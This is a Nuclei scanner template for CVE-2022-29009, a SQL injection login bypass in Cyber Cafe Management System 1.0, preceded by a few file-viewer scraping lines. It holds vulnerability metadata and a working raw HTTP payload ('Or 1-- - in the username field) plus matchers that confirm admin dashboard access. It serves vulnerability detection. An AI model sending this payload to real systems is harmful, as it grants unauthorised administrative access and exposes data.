58 lines
2.1 KiB
YAML
58 lines
2.1 KiB
YAML
id: CVE-2022-29009
|
|
|
|
info:
|
|
name: Cyber Cafe Management System 1.0 - SQL Injection
|
|
author: TenBird
|
|
severity: critical
|
|
description: |
|
|
Cyber Cafe Management System 1.0 contains multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
|
|
impact: |
|
|
Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system.
|
|
remediation: |
|
|
Upgrade to the latest version to mitigate this vulnerability.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/50355
|
|
- https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-29009
|
|
- https://github.com/sudoninja-noob/CVE-2022-29009/blob/main/CVE-2022-29009.txt
|
|
- https://github.com/manas3c/CVE-POC
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2022-29009
|
|
cwe-id: CWE-89
|
|
epss-score: 0.1338
|
|
epss-percentile: 0.95581
|
|
cpe: cpe:2.3:a:phpgurukul:cyber_cafe_management_system:1.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
vendor: phpgurukul
|
|
product: cyber_cafe_management_system
|
|
tags: cve,cve2022,sqli,auth-bypass,edb,phpgurukul
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /ccms/index.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
|
|
|
username=%27+Or+1--+-&password=1&login=
|
|
- |
|
|
GET /ccms/dashboard.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'CCMS Admin Dashboard'
|
|
- 'CCMS ADMIN | Admin'
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a00463044022000db0cd0885747935dbc46e33eb6d39fe6e402cd98a32c27aace125930bb5e02022033d3891f676061411566d32cc3a2628d0bb645c1dbb89d4da9deaf4ec4781f6c:922c64590222798bb761d5b6d8e72950 |